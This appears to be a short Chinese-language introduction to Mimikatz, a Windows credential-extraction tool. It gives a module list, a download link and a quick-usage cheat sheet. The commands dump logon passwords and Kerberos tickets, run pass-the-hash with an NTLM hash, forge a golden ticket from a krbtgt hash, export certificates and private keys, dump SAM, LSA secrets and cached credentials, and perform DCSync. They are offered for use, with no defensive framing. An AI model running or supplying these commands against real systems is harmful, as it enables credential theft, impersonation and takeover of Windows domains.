Mimikatz是一款用C语言编写的开源小工具,2014年4月发布。它非常强大,支持Windows系统内存提取明文密码,哈希,PIN码和Kerberos证书

模块

  • standard
  • privilege
  • crypto
  • sekurlsa
  • kerberos
  • lsadump
  • vault
  • token
  • event
  • ts
  • process
  • service
  • net
  • misc
  • library mimilib
  • driver mimidrv
  • Quick usage

快速使用

privilege::debug
sekurlsa

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

下载地址 https://github.com/gentilkiwi/mimikatz/releases/